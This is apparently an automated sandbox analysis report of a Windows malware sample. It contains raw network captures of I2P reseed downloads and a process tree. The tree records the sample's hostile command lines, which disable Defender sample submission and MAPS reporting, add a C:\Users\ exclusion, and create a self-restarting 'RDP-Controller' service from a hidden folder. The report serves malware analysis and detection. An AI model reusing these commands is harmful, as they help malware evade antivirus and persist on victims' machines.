2024-10-11 14:54:03 UTC	16054	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 10 00 00 00 00 00 01 58 89 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 36 35 31 35 34 31 00 00 00 00 00 00 72 61 6d 62 6c 65 72 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 12 66 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 38 62 52 6b 33 79 69 31 56 43 61 59 43 54 59 74 34 51 37 48 35 5a 68 4b 4e 6b 55 66 7a 55 38 76 6b 31 5a 5a 77 2d 54 51 49 36 73 3d 2e 64 61 74 55 54 05 00 01 a5 1e 09 67 ec 93 5b 88 1b 55 18 c7 27 dd c4 6d 83 ae 17 84 ea d3 0a 5a f5 21 bb cc 39 67 26 73 26 e3 81 66 92 6c 2e dd c9 3d 99 cd 60 1f 26 93 49 26 c9 4e 26 99 99 5c a5 01 7d 90 fa a0 b4 05 a1 52 a5 0b 5a 58 f0 c1 8a d4 a2 28 82 6f 82 28 d8 16 44 44 c4 cb 8b 5a 15 Data Ascii: I2Psu3X1728651541rambler@mail.i2pPKfKY;routerInfo-8bRk3yi1VCaYCTYt4Q7H5ZhKNkUfzU8vk1ZZw-TQI6s=.datUTg[U'mZ!9g&s&fl.=`&I&N&\}RZX(o(DDZ
2024-10-11 14:54:03 UTC	16384	IN	Data Raw: a5 8b 97 99 5b 56 4e 98 85 69 41 b8 7f 94 7b 9e 91 59 40 80 69 49 b2 7b 95 4b 4e 78 60 a1 4f 76 46 69 46 86 b9 73 b1 67 8a 23 c8 47 25 89 e9 06 b6 5c 46 16 c6 96 46 06 e6 e6 c6 46 10 21 90 8f 8c 8c cc 0d cc cc 4d 2d 0d 20 42 20 1f 59 98 5a 1a 18 18 98 9a 5a 82 e3 c2 cc d3 c2 38 32 24 2b d9 d9 af c4 b5 3c 28 d2 24 bd 32 20 3b d0 34 c0 2c cc a2 d0 24 33 b8 cc 33 c5 22 c8 db 25 3c a3 ac 38 d7 02 16 17 0c 0c 3a 90 e0 67 f2 09 b5 66 cd 4b 2d f1 4c 01 09 f3 15 e5 97 96 a4 16 e9 95 a5 16 15 67 e6 e7 d9 b2 19 e8 59 ea 99 99 58 4f 3b c7 f3 63 7b 91 7e 80 14 fb 3a b5 39 95 ae a7 59 e2 45 93 7f 06 8a 26 fd 7b b3 d2 a2 fb 83 e0 8b 43 82 4e 0c 6b d9 5b cf b9 bb b6 6e 3e bb b9 7e ae 78 f5 b4 b6 fd 3d 27 ea 0e fd 5a 63 99 98 13 cb 03 08 00 00 ff ff 50 4b 07 08 3f cc 7c Data Ascii: [VNiA{Y@iI{KNx`OvFiFsg#G%\FFF!M- B YZZ82$+<($2 ;4,$33"%<8:gfK-LgYXO;c{~:9YE&{CNk[n>~x='ZcPK?\|
2024-10-11 14:54:04 UTC	16384	IN	Data Raw: f1 c3 f5 b6 2b df bb b6 af aa 63 48 b1 5d bf 71 a1 44 4c 7a a3 84 bd a2 8f 9b 49 91 7e 56 e1 59 fb 93 89 1f 9e 48 9d 59 fc 65 7b ac f8 e7 63 9f 57 e5 fe ae 69 bd 1b 68 30 2a 8f 5f 3e b3 ab eb dc af 25 f1 6f 85 5a d4 d7 3a 0b c9 dd 97 61 3f 22 df bb e4 c6 96 16 8d ed 8b 9b 1f 0a bc 63 65 60 61 60 67 60 61 60 60 9c 54 3d cb a8 8d 85 8f 01 0a 58 fd 42 9c 03 8c 18 1c 58 92 13 0b 8a 6d 19 4d ac 19 8b 6d 75 c2 82 d3 cd 0d 43 4a cc dc cb 3d cd d3 0a 7d 82 53 fd ca 03 b3 7c ab 5c dc 9c 4d b2 cb eb 42 c3 2a 72 5d 0c 73 dd a2 4a cc 32 f2 6d ad 19 cb 6c 19 8d ac 99 71 18 68 46 ae 81 fc 30 03 59 82 83 43 8d 18 ab 11 0e cc b4 d5 49 2f ce 2c ab f3 ae 8b cc 37 8e f4 ad 2b 32 ca 0c 31 32 0d cc 4e ad 73 4f c9 cc 8f cc 31 89 48 2e f0 f0 f7 89 08 71 ae 0c 37 4e b6 b5 66 cd Data Ascii: +cH]qDLzI~VYHYe{cWih0_>%oZ:a?"ce`a`g`a``T=XBXmMmuCJ=}S\|\MBr]sJ2mlqhF0YCI/,7+212NsO1H.q7Nf
2024-10-11 14:54:04 UTC	16384	IN	Data Raw: 8e 48 0b b2 66 cd 4b 2d f1 4c 01 89 8b e4 a5 96 a4 24 e9 65 e7 e5 97 e7 f9 a4 26 16 a7 06 a7 96 14 db 32 1b 1b 98 59 0b 21 49 05 e5 97 96 a4 16 15 db b2 1a 1a 98 9b 9a 58 f3 15 81 f9 7a 65 a9 45 c5 99 f9 79 b6 6c 06 7a 96 7a 66 86 d6 29 77 75 94 75 17 1d 15 f1 bd 1e c5 73 fd 86 e3 64 fd 19 01 53 b6 06 ca af 3a d2 c1 b7 45 d7 f3 f3 0a a1 e3 62 66 6b 67 2f 3f 9f 19 d7 7c 32 c3 25 35 45 47 ff 45 9d c1 a4 fb 6e 0a 2d 3d 2f f7 47 d4 32 02 02 00 00 ff ff 50 4b 07 08 da 10 af 2b 1d 02 00 00 31 04 00 00 50 4b 03 04 14 00 08 08 08 00 45 63 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 73 78 72 72 4c 6a 50 6b 54 6e 38 33 4a 76 38 35 48 78 6f 52 54 6e 54 31 44 70 36 7a 4a 74 53 47 7e 33 6e 66 38 6a 63 38 42 47 63 3d 2e 64 61 Data Ascii: HfK-L$e&2Y!IXzeEylzzf)wuusdS:Ebfkg/?\|2%5EGEn-=/G2PK+1PKEcKY;routerInfo-sxrrLjPkTn83Jv85HxoRTnT1Dp6zJtSG~3nf8jc8BGc=.da
2024-10-11 14:54:04 UTC	16384	IN	Data Raw: 5f 68 8a 86 48 d8 e3 da 5b b9 1b 53 58 d9 12 79 4f 2e f9 cd ca c0 c2 c0 ce c0 c2 c0 c0 38 a9 7a be bc 09 0b 33 03 14 b0 fa 85 38 07 18 31 94 b0 64 e4 17 97 d8 72 9b 98 ea 19 19 99 ea 99 9b ea 99 58 33 66 da 4a 18 18 45 ba 97 97 06 fb 14 e8 7a 85 79 79 f9 3b 95 e5 39 55 55 96 db da 5a b3 14 e4 17 95 d8 b2 1a 19 1b 98 1a 5a 33 16 db ea 44 99 1a 24 bb 94 1a 95 16 79 97 97 19 1a a5 19 98 a6 65 18 26 1b 66 5a 64 99 fb fb a5 24 fb a5 04 97 5b f8 f9 a6 86 14 9b 18 a6 db 5a 33 96 d9 32 1a 59 a3 3b a2 02 e2 08 7e 23 0b 03 63 2b 43 4b 23 03 2b 2b 23 2b 73 03 da 3b 84 03 e6 10 96 e0 e0 50 23 86 89 2c c9 89 05 c5 b6 8c ce d6 d8 43 45 27 38 c4 cc c8 d8 c8 d2 cb 31 3c a8 2a c4 30 c9 27 cd dd b8 c2 cb 3d 2d d2 23 b3 38 38 b5 30 24 c7 d4 b4 34 d4 ac 28 dc a5 a4 24 14 8b Data Ascii: _hH[SXyO.8z381drX3fJEzyy;9UUZZ3D$ye&fZd$[Z32Y;~#c+CK#++#+s;P#,CE'81<*0'=-#880$4($
2024-10-11 14:54:04 UTC	7195	IN	Data Raw: 2d 56 69 4b 4a 4d 36 61 37 50 50 75 4b 68 34 32 71 30 52 55 43 69 61 41 5a 6a 6a 72 6a 6c 64 5a 6e 47 6b 3d 2e 64 61 74 55 54 05 00 01 3f 1e 09 67 50 4b 01 02 14 00 14 00 08 08 08 00 52 65 4b 59 b8 55 e3 78 97 02 00 00 ae 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 01 7e 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4e 7a 73 76 6f 34 52 63 77 55 74 47 4e 57 70 74 4a 53 51 48 43 4f 71 61 76 48 4e 65 68 75 63 74 73 67 70 7a 36 6a 49 4a 76 7e 67 3d 2e 64 61 74 55 54 05 00 01 3c 1d 09 67 50 4b 01 02 14 00 14 00 08 08 08 00 06 66 4b 59 eb 9a f9 4c e4 02 00 00 05 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 0a 81 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 34 74 49 42 47 69 69 7e 4f 51 47 48 52 6f 4d 30 54 77 52 45 4f 73 77 64 6d 57 46 34 67 66 6d 43 38 6e 41 Data Ascii: -ViKJM6a7PPuKh42q0RUCiaAZjjrjldZnGk=.datUT?gPKReKYUx;~routerInfo-Nzsvo4RcwUtGNWptJSQHCOqavHNehuctsgpz6jIJv~g=.datUT<gPKfKYL;routerInfo-4tIBGii~OQGHRoM0TwREOswdmWF4gfmC8nA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50026	23.137.250.108	443	2256	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 14:54:53 UTC	104	OUT	GET https://banana.incognet.io:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-11 14:54:53 UTC	373	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 14:54:53 GMT Content-Type: text/html Content-Length: 13696 Last-Modified: Thu, 18 Nov 2021 02:02:21 GMT Connection: close Vary: Accept-Encoding ETag: "6195b42d-3580" Server: banana.incognet.io Cache-Control: public, max-age=604800, immutable Access-Control-Allow-Origin: * Vary: Origin Allow: GET Accept-Ranges: bytes
2024-10-11 14:54:53 UTC	13696	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 66 61 76 69 63 6f 6e 2e 73 76 67 3e 3c 74 69 74 6c 65 3e 62 61 6e 61 6e 61 2e 69 6e 63 6f 67 6e 65 74 2e 69 6f 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 61 74 20 63 65 6e 74 65 72 2c 23 65 36 64 62 62 30 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 36 30 25 29 2c 72 65 70 65 61 74 69 6e 67 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 34 35 64 65 67 2c 23 65 36 64 62 62 30 20 32 2e 35 25 2c 23 65 36 64 32 38 32 20 35 25 29 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 2c 72 65 70 65 61 74 69 6e 67 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 Data Ascii: <!doctype html><link rel=icon href=favicon.svg><title>banana.incognet.io</title><style>html{background:radial-gradient(circle at center,#e6dbb0,transparent 60%),repeating-linear-gradient(45deg,#e6dbb0 2.5%,#e6d282 5%) center center,repeating-linear-gradie

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50027	80.74.145.70	443	2256	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-11 14:54:54 UTC	106	OUT	GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2024-10-11 14:54:54 UTC	406	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 11 Oct 2024 14:54:54 GMT Content-Type: application/octet-stream Content-Length: 71860 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
2024-10-11 14:54:54 UTC	15978	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 16 68 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 36 34 31 35 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 00 08 00 e7 50 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 44 55 4e 30 7a 57 30 7a 66 64 61 41 2d 71 6b 61 47 78 66 35 64 68 47 6c 48 75 6f 79 33 76 48 74 31 77 58 78 57 51 53 38 6b 73 3d 2e 64 61 74 55 54 05 00 01 d3 f8 08 67 da a3 36 45 4b 65 22 4f 66 c8 bd 8c f4 3b 65 93 6b d9 ce 6c e3 9f d9 64 22 fc f2 9b e1 5f c9 29 9e 15 09 b3 ee ce aa 91 54 ae dd 2c 51 91 76 6c f9 9d ee 45 e7 76 cc 5c c6 5a 5e cb 16 38 fd 97 d6 56 e6 cc 51 79 fc f2 ce 4f 6e 44 d9 1c f2 ab 59 Data Ascii: I2Psu3h1728641593reseed@diva.exchangePKPKY;routerInfo-XDUN0zW0zfdaA-qkaGxf5dhGlHuoy3vHt1wXxWQS8ks=.datUTg6EKe"Of;ekld"_)T,QvlEv\Z^8VQyOnDY
2024-10-11 14:54:54 UTC	16384	IN	Data Raw: 51 6d b9 ed 92 7f 6d cf af 5c 9d d4 fb e6 e7 2d 09 9f 09 29 d7 37 84 c5 75 94 aa f4 ef b7 d4 3a f2 40 ac 73 f1 19 0b af 5b df 0c 16 9e 65 dd b9 9c 85 b7 ad ad da d0 3c 45 f6 8d 4a 93 e7 93 c2 ac 4d 2b b6 f3 7f a8 59 74 77 8a f5 d9 9f fb 95 05 34 8a cf 45 b8 b4 85 69 fd a8 5a d9 2d a1 f4 a2 4f d3 68 9a fc 79 df fd 25 ac 0c 2c 0c ec 0c 2c 0c 0c 8c 93 aa 7e ae bc cb c2 ca 00 05 2c c1 c1 a1 46 0c 53 58 92 13 0b 8a 6d 19 9d ac 59 32 f2 8b 4b 6c f9 cc cc f5 0c cd 0d f5 8c 8c 2c f4 0c 8d 2d ac 19 33 6d 75 1c f3 5c 82 bd 2c bc 32 ca cb f2 22 0a 75 9d 9c f3 ab fc 2c eb aa bc 92 42 fd 4a 52 bd c2 74 1d 33 82 43 bc 52 52 0a 0c 9d 0c 92 6d ad 59 0a f2 8b 4a 6c 59 0d 8d 4c cd cd ad 19 8b 6d 75 bc b3 23 a3 22 23 8c 03 3c 43 a3 f2 0b 8b 8c bc 4d 0b 0b fc 7d cc 52 5c 4c Data Ascii: Qmm\-)7u:@s[e<EJM+Ytw4EiZ-Ohy%,,~,FSXmY2Kl,-3mu\,2"u,BJRt3CRRmYJlYLmu#"#<CM}R\L
2024-10-11 14:54:54 UTC	16384	IN	Data Raw: 66 96 1d 1d 02 00 00 35 04 00 00 50 4b 03 04 14 00 08 00 08 00 48 51 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6f 79 4f 76 51 77 5a 6d 41 73 71 46 4b 46 37 59 78 6e 77 42 69 6f 53 66 6c 47 44 67 38 50 6e 53 6e 46 79 79 61 75 72 6a 67 36 30 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 b2 93 f8 b5 f8 aa 43 8c bd f7 b2 7d 6e b7 19 77 b1 71 14 cb 3e 59 53 a2 64 70 eb 5d b2 c8 d2 27 b3 32 8e ae e1 2b cc d5 9e ab db e1 7d d6 a8 d7 81 75 af 91 fd db bb b3 d7 4e 9e cf cf c7 b2 38 e5 b3 9d 5e ed 1c 31 a9 6b e7 ec 5a bf 38 2f df a4 c9 e9 32 bd e1 a7 d0 21 e1 c4 29 17 d7 e8 dc e9 0d dc b5 b2 d4 eb e4 87 29 5f 8e 19 dd b2 d0 be b8 34 fc 4e ba bc bf 57 c1 39 1d d9 9f c7 54 97 32 b9 57 6a df 9f 14 d5 f7 ea 72 72 f5 44 a3 bb 0f Data Ascii: f5PKHQKY;routerInfo-oyOvQwZmAsqFKF7YxnwBioSflGDg8PnSnFyyaurjg60=.datUTgC}nwq>YSdp]'2+}uN8^1kZ8/2!))_4NW9T2WjrrD
2024-10-11 14:54:54 UTC	16384	IN	Data Raw: f9 75 0c d3 8f ff 5e d0 ab a2 1a d5 79 96 95 81 85 81 9d 81 85 81 81 71 52 95 7c fb 2b 26 66 06 28 60 f5 0b 71 0e 30 62 28 67 c9 c8 2f 2e b1 e5 33 b7 d4 33 34 34 d1 33 b4 30 d3 33 b4 30 b6 66 cc b4 95 30 0d cd 70 f2 f6 ac aa d0 cd 37 2c cc c8 c8 32 a9 0a f4 ce f4 0b b4 b5 b5 66 29 c8 2f 2a b1 65 35 35 34 36 32 b1 66 2c b6 d5 49 cb f0 c9 4d f4 0a 31 c8 2a b1 c8 b2 28 77 2f 48 0e 32 73 2d f2 cd 4f 0f 8a 30 ca 2a a8 34 0b ae f4 f4 35 4c 0a 31 73 35 f1 f0 b5 b5 66 2c b3 65 34 b2 e6 80 b9 83 25 38 38 d4 88 61 0a 4b 72 62 41 b1 2d a3 b3 35 4e f7 e8 98 a6 fa 7b 1b 06 26 1a a7 64 84 b8 15 e4 45 19 a6 66 a5 15 1b a6 f8 5a 96 87 14 96 1a 94 58 06 9b fa 3a 57 7a 18 9b 07 a7 e7 59 60 71 a3 ab b3 6f 78 91 47 8a 77 78 84 5b 9d bb 47 96 79 52 61 52 64 56 5a 55 52 64 44 Data Ascii: u^yqR\|+&f(`q0b(g/.33443030f0p7,2f)/e55462f,IM1(w/H2s-O0*45L1s5f,e4%88aKrbA-5N{&dEfZX:WzY`qoxGwx[GyRaRdVZURdD
2024-10-11 14:54:54 UTC	6730	IN	Data Raw: 4d 36 78 38 55 4b 51 2d 64 4a 58 6a 7a 62 65 58 79 6d 36 64 48 69 51 41 45 4d 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 50 4b 01 02 14 00 14 00 08 08 08 00 48 51 4b 59 24 07 54 78 1a 02 00 00 30 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 9d 4a 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 61 4b 35 4c 35 71 39 34 74 61 35 43 58 30 33 6a 50 79 7e 63 4e 70 56 75 71 73 31 57 4c 76 31 64 67 58 4e 79 35 73 44 43 64 4f 51 3d 2e 64 61 74 55 54 05 00 01 89 f9 08 67 50 4b 01 02 14 00 14 00 08 00 08 00 48 51 4b 59 df c1 34 b7 1b 02 00 00 30 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 29 4d 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 76 30 73 75 78 57 5a 4f 67 37 6b 48 65 4e 73 37 44 61 75 76 66 41 66 34 46 70 59 53 73 71 31 52 5a 6a 42 34 6a 2d 4a 62 33 45 6b 3d Data Ascii: M6x8UKQ-dJXjzbeXym6dHiQAEM=.datUTgPKHQKY$Tx0;JrouterInfo-aK5L5q94ta5CX03jPy~cNpVuqs1WLv1dgXNy5sDCdOQ=.datUTgPKHQKY40;)MrouterInfo-v0suxWZOg7kHeNs7DauvfAf4FpYSsq1RZjB4j-Jb3Ek=

Target ID:	0
Start time:	10:53:04
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	5'654'528 bytes
MD5 hash:	31D649663149DABD99C51B71E60A4A91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:53:04
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	5'654'528 bytes
MD5 hash:	31D649663149DABD99C51B71E60A4A91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	10:53:08
Start date:	11/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"
Imagebase:	0x7ff7b72b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:53:08
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:53:08
Start date:	11/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:53:08
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe"
Imagebase:	0x7ff64b930000
File size:	98'304 bytes
MD5 hash:	319865D78CC8DF6270E27521B8182BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:53:11
Start date:	11/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:	0x7ff7699e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:53:13
Start date:	11/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:53:56
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe"
Imagebase:	0x7ff70f330000
File size:	10'639'360 bytes
MD5 hash:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:	0x7ff7b25f0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe stop RDP-Controller
Imagebase:	0x7ff7169c0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:	0x7ff7169c0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:	0x7ff7169c0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:53:59
Start date:	11/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe start RDP-Controller
Imagebase:	0x7ff7169c0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:54:00
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:54:00
Start date:	11/10/2024
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff7c1ab0000
File size:	89'088 bytes
MD5 hash:	4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:54:00
Start date:	11/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:	0x7ff709000000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:54:01
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
